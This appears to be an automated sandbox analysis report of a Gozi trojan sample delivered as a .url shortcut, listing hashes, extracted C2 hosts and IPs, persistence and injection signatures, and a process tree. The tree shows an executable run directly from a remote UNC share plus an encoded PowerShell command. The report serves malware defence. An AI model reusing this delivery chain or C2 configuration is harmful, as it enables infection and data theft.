Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
12/01/2023, 11:04
Static task
static1
Behavioral task
behavioral1
Sample
Agenzia/Agenzia.url
Resource
win7-20220812-en
General
-
Target
Agenzia/Agenzia.url
-
Size
198B
-
MD5
8255e59c6627179ac30097e560a27251
-
SHA1
6d9450bf771036d2437830ad2c1298a2039c9042
-
SHA256
ac62dd1a56f4c94f7c8ef5764eefd66a9ddc7fe0d6335d2db15486a7410a1003
-
SHA512
64472b0984cafb121e9603b13ca14438e9f126e75815e0c4712a110e18fd093015e6c5b06a0f92c7e14abcf10fb9908f38a80818acbeee1f4c7a003f89343d30
Malware Config
Extracted
gozi
Extracted
gozi
7704
checklist.skype.com
62.173.149.202
31.41.44.158
193.0.178.157
-
base_path
/drew/
-
build
250249
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 3116 maintainabovl.exe 380 maintainabovl.exe 4412 maintainabovl.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation maintainabovl.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Informazion.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Informazion.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3116 set thread context of 4412 3116 maintainabovl.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3604 powershell.exe 3604 powershell.exe 3116 maintainabovl.exe 3116 maintainabovl.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3116 maintainabovl.exe Token: SeDebugPrivilege 3604 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4712 wrote to memory of 752 4712 rundll32.exe 81 PID 4712 wrote to memory of 752 4712 rundll32.exe 81 PID 752 wrote to memory of 3116 752 Informazion.exe 86 PID 752 wrote to memory of 3116 752 Informazion.exe 86 PID 752 wrote to memory of 3116 752 Informazion.exe 86 PID 3116 wrote to memory of 3604 3116 maintainabovl.exe 92 PID 3116 wrote to memory of 3604 3116 maintainabovl.exe 92 PID 3116 wrote to memory of 3604 3116 maintainabovl.exe 92 PID 3116 wrote to memory of 380 3116 maintainabovl.exe 94 PID 3116 wrote to memory of 380 3116 maintainabovl.exe 94 PID 3116 wrote to memory of 380 3116 maintainabovl.exe 94 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95 PID 3116 wrote to memory of 4412 3116 maintainabovl.exe 95
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia\Agenzia.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4712 -
\??\UNC\62.173.147.10\Agenzia\Informazion.exe"\\62.173.147.10\Agenzia\Informazion.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe4⤵
- Executes dropped EXE
PID:380
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe4⤵
- Executes dropped EXE
PID:4412
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
362.4MB
MD5b405b1565194722f9457002c4edacbae
SHA13a3b6f5a05d8d2e95432abea5241f9fc5178a6fa
SHA256c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59
SHA512bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720
-
Filesize
362.4MB
MD5b405b1565194722f9457002c4edacbae
SHA13a3b6f5a05d8d2e95432abea5241f9fc5178a6fa
SHA256c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59
SHA512bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720
-
Filesize
362.4MB
MD5b405b1565194722f9457002c4edacbae
SHA13a3b6f5a05d8d2e95432abea5241f9fc5178a6fa
SHA256c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59
SHA512bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720
-
Filesize
362.4MB
MD5b405b1565194722f9457002c4edacbae
SHA13a3b6f5a05d8d2e95432abea5241f9fc5178a6fa
SHA256c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59
SHA512bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720